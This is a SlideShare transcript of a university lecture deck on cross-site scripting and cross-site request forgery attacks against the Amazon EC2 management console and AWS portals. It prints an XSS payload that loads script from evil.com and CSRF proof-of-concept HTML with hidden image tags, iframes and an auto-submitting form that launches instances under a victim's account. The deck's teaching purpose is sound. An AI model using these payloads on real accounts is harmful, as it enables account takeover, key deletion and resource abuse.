Your SlideShare is downloading. ×
0
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Cloud Insecurity
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Cloud Insecurity

3,059

Published on

A short presentation for a university class.

A short presentation for a university class.

Published in: Technology, Business
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
3,059
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Marco Arena
  • 2. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 3. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 4. Recalls • XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack (the website becomes the vector through which attackers reach their victims). • XSS is today’s most widely reported software vulnerability.
  • 5. Recalls • XSS, a simple example: <c:if test=“${param.sayHello}”> Server-Side JSP Hello ${param.name}! </c:if> Evil parameter: %3Cscript%20src%3D%22Dhttp%3A//evil.com/evil.js%22%3E%3C /script%3E Result: Hello <script src=“http://evil.com/evil.js”></script>
  • 6. Recalls • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. • CSRF tricks the victim into loading a page that contains a malicious request.
  • 7. Recalls • CSRF, a simple example: ... <img src=“http://truste Trusted blog (i.e. MySpace) dblog.com/addfrien d.php?id=12345”/> ... Active session User Evil Site
  • 8. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 9. Attacks against EC2 • The Amazon EC2 cloud is managed via web services and web interface consoles. • The web management console asks the user to provide her Amazon.com username and password. • The login page is hosted on the Amazon.com domain, making it susceptible to web application vulnerabilities found anywhere on the domain.
  • 10. Attacks against EC2 • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
  • 11. Attacks against EC2 • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
  • 12. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 13. Amazon EC2 real vulnerabilities • The security of AMI instances depends on the web management console for security. • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
  • 14. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 15. Web management console vulnerabilities • The first allows the attacker to start an arbitrary AMI instance using the victim’s EC2 account. • Two parts: – Initialize an evil AMI; – Launch the instance under the victim’s EC2 account.
  • 16. Web management console vulnerabilities initialize.html: <html> <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
  • 17. Web management console vulnerabilities initialize.html: Cross-Domain <html> Image Tag <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
  • 18. Web management console vulnerabilities launch.html: <html> <body> <form action="https://console.aws.amazon.com/ec2/runInstancesJson?" id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST"> <input type="hidden" name="action.MinCount" value="1" /> <input type="hidden" name="action.InstanceType" value="m1.small" /> <input type="hidden" name="action.SecurityGroup" value="default" /> <input type="hidden" name="action.SecurityGroup" value="Webserver" /> <input type="hidden" name="action.MaxCount" value="1000000" /> <input type="hidden" name="action.ImageId" value="ami-00031337" /> <input type="hidden" name="mbtc" value="50084" /> <input type="hidden" name="region" value="us-east-1" /> </form> <script> setTimeout("document.LaunchEvilAMI.submit()",5000); </script> </body> </html>
  • 19. Web management console vulnerabilities
  • 20. Web management console vulnerabilities Merge: <html> <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
  • 21. Web management console vulnerabilities Merge: The browser will not display the reply of <html> the web server. <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
  • 22. Web management console vulnerabilities • The second vulnerability terminates arbitrary AMIs being run by the victim. • After the attack is launched, the victim can see that the instance was terminated without her consent.
  • 23. Web management console vulnerabilities • The last vulnerability involves the deletion of AMI key pairs. • Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim’s EC2 session. If the key pair is deleted, and the user has not properly backed up the key pair, he will have lost access to his own AMIs!
  • 24. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 25. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates
  • 26. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates.
  • 27. AWS portals vulnerabilities • The first attack against AWS generates a new access key for the EC2 user’s session. • Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user’s account. • The attacker can create a temporary denial of service as the administrator must now update all the applications utilizing access key authentication to use the newly generated key.
  • 28. AWS portals vulnerabilities • This next attack forcibly deletes any X.509 certificates previously generated by the EC2 user. • Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with the newly generated certificates.
  • 29. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 30. Conclusions • Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users. • But it does not magically protect application logic from abuse or prevent attacks against the application level.
  • 31. Conclusions • Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines. • Cloud providers must fix their security bugs and perform an incessant code review.
  • 32. References • Hacking: the Next Generation Nitesh Dhanjani, Billy Rios, and Brett Hardin. O’Reilly, 2009. • Hacking Exposed: Web 2.0 Rich Cannings, Himanshu Dwivedi, Zane Lackey. Mc-Graw Hill, 2008 • Secure Programming with Static Analysis Brian Chess, Jacob West. Addison-Wesley, 2007.

×